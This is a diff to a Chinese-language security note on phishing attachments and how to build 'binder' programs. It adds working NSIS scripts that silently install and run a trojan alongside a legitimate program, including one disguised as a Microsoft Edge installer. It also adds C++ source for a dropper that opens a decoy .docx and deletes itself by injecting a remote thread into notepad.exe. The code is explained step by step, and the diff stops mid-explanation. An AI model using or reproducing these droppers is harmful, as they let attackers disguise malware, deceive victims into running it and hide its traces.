--- a/docs/网络安全/钓鱼/钓鱼附件/可执行程序/捆绑程序.md
+++ b/docs/网络安全/钓鱼/钓鱼附件/可执行程序/捆绑程序.md
@@ -78,7 +78,138 @@
 
 > [捆绑马的制作 - yanq的个人博客 (saucer-man.com)](https://saucer-man.com/information_security/1168.html)
 
+NSIS（Nullsoft Scriptable Install System）是一个专业的开源系统，用于创建 Windows 安装程序。
 
+NSIS 可以用于创建能够安装、卸载、设置系统设置、提取文件等的安装程序。基于脚本文件，所以使用简单方便，同时也是免费软件，无需破解，其下载地址为https://nsis.sourceforge.io/Download
+
+NSIS 是编译器，需要编写nsi脚本然后编译。
+
+配置 NSIS 环境变量, 以便后续可以方便调用 `makensis.exe`, 默认路径为
+
+```
+C:\Program Files (x86)\NSIS
+C:\Program Files (x86)\NSIS\Bin
+```
+
+安装 VSCode 扩展 NSIS
+
+![image-20240717175046654](http://cdn.ayusummer233.top/DailyNotes/202407171750185.png)
+
+编写如下 nsis 文件, 具体可参阅 [NSIS Users Manual (sourceforge.io)](https://nsis.sourceforge.io/Docs/)
+
+```nsis
+; 设置编译结果的输出文件
+OutFile "安装包.exe"
+
+; 设置exe的图标
+Icon "1.ico" 
+
+; 直接请求uac 提权
+RequestExecutionLevel admin 
+
+
+!include "FileFunc.nsh" 
+
+; 静默安装，调试的时候可以把这个关了，实际运行的时候要开静默
+SilentInstall silent  
+
+
+; 初始化脚本
+; 安装程序开始执行之前完成的任务
+; 这里可以检查木马文件是否已经存在了，但是这里我先不做这么多
+Function .onInit
+  
+FunctionEnd
+
+
+; 开始安装步骤1，将"木马.exe"复制到"$TEMP\xxxxx"
+Section "Section1" SEC01
+    ; 这里设置一个目录，下面的文件都会被释放到这个目录底下，目录不存在的话会自动创建目录
+    SetOutPath  "$TEMP\xxxxx"
+    ; 指定安装包在打包时要包含进那些文件，安装时会将"木马.exe"释放到"$TEMP\xxxxx"
+    File "木马.exe" 
+
+SectionEnd
+
+; 开始安装步骤2，将"正常文件.exe"复制到"$TEMP\xxxx2"
+Section "Section2" SEC02
+    SetOutPath "$TEMP\xxxx2"
+    File "正常文件.exe"
+SectionEnd
+
+; 会在安装成功后执行，这里就直接执行exe就好了
+Function .onInstSuccess
+  Exec "$TEMP\xxxxx\木马.exe"
+  Exec "$TEMP\xxxx2\正常文件.exe
+  ; 打开文档可以用下面的命令
+  ; ExecShell open  "$TEMP\测试文档.docx"
+FunctionEnd
+
+```
+
+例如
+
+```nsis
+OutFile "MicrosoftEdgeSetupNSIS.exe"
+
+Icon "IDR_MAINFRAME.ico" 
+
+RequestExecutionLevel admin 
+
+
+!include "FileFunc.nsh" 
+
+SilentInstall silent  
+
+
+Function .onInit
+  
+FunctionEnd
+
+
+Section "Section1" SEC01
+    SetOutPath  "$TEMP"
+    File "msedge.exe" 
+
+SectionEnd
+
+Section "Section2" SEC02
+    SetOutPath "$TEMP"
+    File "MicrosoftEdgeSetup.exe"
+SectionEnd
+
+Function .onInstSuccess
+  Exec "$TEMP\msedge.exe"
+  Exec "$TEMP\MicrosoftEdgeSetup.exe"
+FunctionEnd
+
+```
+
+然后呼出 VSCode 命令面板(`Ctrl+Shift+P`), 输入 `nsis` 选择 `NSIS:Create Build Task`
+
+![image-20240718101908801](http://cdn.ayusummer233.top/DailyNotes/202407181019336.png)
+
+这会在当前项目根目录创建一个 `.vscode/task.json`  文件, 内容大概如下:
+
+![image-20240718103201982](http://cdn.ayusummer233.top/DailyNotes/202407181032137.png)
+
+接下来将窗口切回到刚才编写的 NSIS 文件, `Ctrl+Shift+P` 呼出命令面板, 选择 `Tasks:Run Build Task`
+
+![image-20240718103435988](http://cdn.ayusummer233.top/DailyNotes/202407181034116.png)
+
+这将会根据 `tasks.json` 中的配置来 build 当前 nsis 任务
+
+![image-20240718103632395](http://cdn.ayusummer233.top/DailyNotes/202407181036498.png)
+
+运行编译生成文件会弹出 UAC 授权窗口， 点击确定后即会运行程序
+
+![image-20240718104156954](http://cdn.ayusummer233.top/DailyNotes/202407181041070.png)
+
+运行恶意程序上线攻击机并且运行正常程序下载 Microsoft Edge:
+
+![image-20240718104349211](http://cdn.ayusummer233.top/DailyNotes/202407181043302.png)
+
+![image-20240718104217051](http://cdn.ayusummer233.top/DailyNotes/202407181042143.png)
 
 ---
 
@@ -196,4 +327,256 @@ msf6 exploit(multi/handler) > run
 ![image-20240717162459264](http://cdn.ayusummer233.top/DailyNotes/202407171624408.png)
 
 ---
+
+## cpp实现捆绑程序
+
+> [奇安信攻防社区-关于文件捆绑的实现 (butian.net)](https://forum.butian.net/share/1778)
+
+上述文章中作者编写了如下程序, 运行该程序会创建一个新的 `.docx` 文件，并将资源文件的内容写入该文件。
+
+打开 `.docx` 文件。
+
+创建一个 `notepad.exe` 进程，并将删除当前程序的操作注入到该进程中，从而实现自删除功能。
+
+---
+
+`Bundled.h`
+
+```cpp
+// #pragma once 确保头文件只会被包含一次
+#pragma once
+// Windows API的头文件
+#include<Windows.h>
+
+typedef struct DeleteStruct
+{
+    FARPROC dwDeleteFile;
+    CHAR dwDeleteFile_param_1[MAX_PATH];
+};
+
+typedef BOOL(WINAPI* wDeleteFileA)(
+    _In_ LPCSTR lpFileName
+    );
+```
+
+定义了一个结构体 `DeleteStruct`，包含两个成员：
+
+- `dwDeleteFile`：保存函数指针。
+- `dwDeleteFile_param_1`：保存要删除的文件名。
+
+---
+
+定义了一个函数指针类型 `wDeleteFileA`，对应于Windows API的 `DeleteFileA` 函数
+
+- `WINAPI`
+
+  `WINAPI` 是一个调用约定，定义为 `__stdcall`，用于指示函数的参数从右到左压入堆栈，并由被调用函数清理堆栈。这是 Windows API 函数的标准调用约定。
+
+- `(*wDeleteFileA)`
+
+  `(*wDeleteFileA)` 定义了一个名为 `wDeleteFileA` 的指针，这个指针指向一个符合特定签名的函数。
+
+- 参数列表 `(_In_ LPCSTR lpFileName)`
+
+  参数列表描述了该函数指针指向的函数所接受的参数类型：
+
+  - `_In_` 是一个 SAL（Source Annotation Language）注释，指示参数是输入参数。
+  - `LPCSTR` 是一个指向常量字符串的指针，表示该函数接受一个指向常量字符串的指针作为参数。
+
+总的来说定义了一个名为 `wDeleteFileA` 的新类型，这个类型是一个指向具有以下签名的函数的指针：
+
+- 返回类型为 `BOOL`（一个布尔值）。
+- 调用约定为 `WINAPI`（Windows API 标准调用约定）。
+- 接受一个参数：类型为 `LPCSTR`，即一个指向常量字符串的指针，表示文件名。
+
+---
+
+`Bundled.cpp`
+
+```cpp
+#include <iostream>
+#include <windows.h>
+#include "Bundled.h"
+
+DWORD64 WINAPI threadProc(LPVOID lParam) {
+
+    INT RET = 20000;
+    for (size_t i = 0; i < 20000; i++)
+    {
+        RET = RET - 1;
+    }
+    //循环一下起延时作用，防止线程创建了文件还没有关系，这样删除就失败了
+    wDeleteFileA kDeleteFileA;
+    DeleteStruct* DS = (DeleteStruct*)lParam;
+    kDeleteFileA = (wDeleteFileA)DS->dwDeleteFile;
+    kDeleteFileA(DS->dwDeleteFile_param_1);
+    //删除文件
+    return RET;
+}
+
+int main(int argc, char* argv[])
+{
+    CHAR PathFileName[MAX_PATH] = { 0 };
+    CHAR FileName[MAX_PATH] = { 0 };
+
+    HRSRC Resource = FindResourceA(NULL, MAKEINTRESOURCEA(101), "docx");
+    //得到资源文件HRSRC句柄
+    HGLOBAL ResourceGlobal = LoadResource(NULL, Resource);
+    //得到资源文件ResourceGlobal句柄
+    DWORD FileSize = SizeofResource(NULL, Resource);
+    //得到资源文件的大小
+    LPVOID PFILE = LockResource(ResourceGlobal);
+    //得到指向资源文件内容的指针
+    GetModuleFileNameA(NULL, PathFileName, MAX_PATH);
+    //当前进程的路径和名称
+    strcpy_s(FileName, strrchr(PathFileName, '\\')+1);
+    /*
+    strrchr得到第二个参数最后出现的位置
+    d:\\xxxxx\\xxxxxx\\xxxx.exe在执行后得到\\xxxx.exe
+    所以需要+1把\\去掉
+    最后得到了完整的文件名
+    用strcpy_s把文件名复制到FileName中
+    */
+    for (size_t i = 0; i < MAX_PATH; i++)
+    {
+        if(FileName[i] == '.')
+        {
+            FileName[i + 1] = 'd';
+            FileName[i + 2] = 'o';
+            FileName[i + 3] = 'c';
+            FileName[i + 4] = 'x';
+            break;
+        }
+    }
+    //循环找文件名中的.，找到后将文件名的后缀改为docx
+    //这个步骤主要是为了方便，以后只需要改exe的名称不需要到代码中来改
+    HANDLE FILE = CreateFileA(FileName, FILE_ALL_ACCESS, 0, NULL, CREATE_ALWAYS, 0, NULL);
+    //创建文件名相同的文件
+    DWORD dwSize;
+    WriteFile(FILE, PFILE, FileSize, &dwSize, NULL);
+    // 把资源文件中的内容写入
+
+    SHELLEXECUTEINFOA shellexecute = { 0 };
+    shellexecute.cbSize = sizeof(shellexecute);
+    shellexecute.lpFile = FileName;
+    shellexecute.nShow = SW_SHOW;
+    ShellExecuteExA(&shellexecute);
+    //打开docx文件
+
+    //下面是实现自删除，网上的自删除方法有很多，用的多的是批处理，这里是创建一个进程然后用远程线程注入来让notepad删除当前程序
+    STARTUPINFOA si = { 0 };
+    PROCESS_INFORMATION  pi = { 0 };
+    CreateProcessA("c:\\windows\\system32\\notepad.exe", 0, 0, 0, TRUE, CREATE_NO_WINDOW | CREATE_SUSPENDED, 0, 0, &si, &pi);
+    //创建进程
+    DeleteStruct DS;
+    DS.dwDeleteFile = GetProcAddress(GetModuleHandleA("kernel32.dll"), "DeleteFileA");
+    GetModuleFileNameA(NULL, DS.dwDeleteFile_param_1, MAX_PATH);
+    //创建远程线程不能直接使用API，需要把函数指针放在结构中传过去
+    //这里需要DeleteFileA这个函数，用GetProcAddress得到指针后传过去
+
+    LPVOID ADDRESS = VirtualAllocEx(pi.hProcess, 0, 2048, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+    WriteProcessMemory(pi.hProcess, ADDRESS, &threadProc, 2048, 0);
+    //为函数开辟一块内存
+
+    LPVOID pRemoteParam = VirtualAllocEx(pi.hProcess, 0, sizeof(DS), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+    WriteProcessMemory(pi.hProcess, pRemoteParam, &DS, sizeof(DS), 0);
+    DWORD RETSIZE;
+    //为参数开辟一块内存
+    HANDLE Thread = CreateRemoteThread(pi.hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)ADDRESS, pRemoteParam, 0, &RETSIZE);
+    //执行该线程
+    CloseHandle(Thread);
+    //关闭句柄
+
+}
+```
+
+---
+
+
+- **线程过程 `threadProc`** 在主函数 `main` `line82` 被调用
+  - 这是一个在远程进程中运行的线程函数。
+  - 先进行了一个简单的延时循环，目的是防止线程创建了文件还没有关闭。
+  - 从 `lParam` 中获取传递过来的结构体 `DeleteStruct`。
+  - 从结构体中获取 `DeleteFileA` 函数指针并调用它删除文件。
+
+---
+
+- **主函数 `main`**
+  - 获取当前进程的路径和名称。
+  - 将当前文件的扩展名改为 `.docx`。
+  - 创建一个同名的 `.docx` 文件，并将资源文件内容写入该文件。
+  - 使用 `ShellExecuteExA` 打开该 `.docx` 文件。
+  - 创建一个新的 `notepad.exe` 进程，用于删除当前程序。
+  - 使用 `VirtualAllocEx` 在远程进程中分配内存，用于存储线程函数和参数。
+  - 使用 `WriteProcessMemory` 将线程函数和参数写入远程进程的内存中。
+  - 使用 `CreateRemoteThread` 创建一个远程线程来执行删除操作。
+
+---
+
+### 代码详解
+
+```cpp
+DWORD64 WINAPI threadProc(LPVOID lParam) {
+
+    INT RET = 20000;
+    for (size_t i = 0; i < 20000; i++)
+    {
+        RET = RET - 1;
+    }
+    //循环一下起延时作用，防止线程创建了文件还没有关系，这样删除就失败了
+    wDeleteFileA kDeleteFileA;
+    DeleteStruct* DS = (DeleteStruct*)lParam;
+    kDeleteFileA = (wDeleteFileA)DS->dwDeleteFile;
+    kDeleteFileA(DS->dwDeleteFile_param_1);
+    //删除文件
+    return RET;
+}
+```
+
+`DWORD64 WINAPI threadProc(LPVOID lParam) `
+
+- 返回类型 `DWORD64`
+
+  `DWORD64` 是一个64位无符号整数，表示函数的返回值类型。
+
+- 调用约定 `WINAPI`
+
+  `WINAPI` 定义了函数的调用约定，通常是 `__stdcall`，用于指定函数参数的传递方式和堆栈清理方式。
+
+- 参数 `LPVOID lParam`
+
+  `LPVOID` 是一个指向任意类型的指针，表示传递给线程的参数。
+
+---
+
+```cpp
+//循环一下起延时作用，防止线程创建了文件还没有关系，这样删除就失败了
+INT RET = 20000;
+for (size_t i = 0; i < 20000; i++)
+{
+    RET = RET - 1;
+}
+```
+
+这段程序本意是做个时延, 防止进程创建时文件还没有
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
 
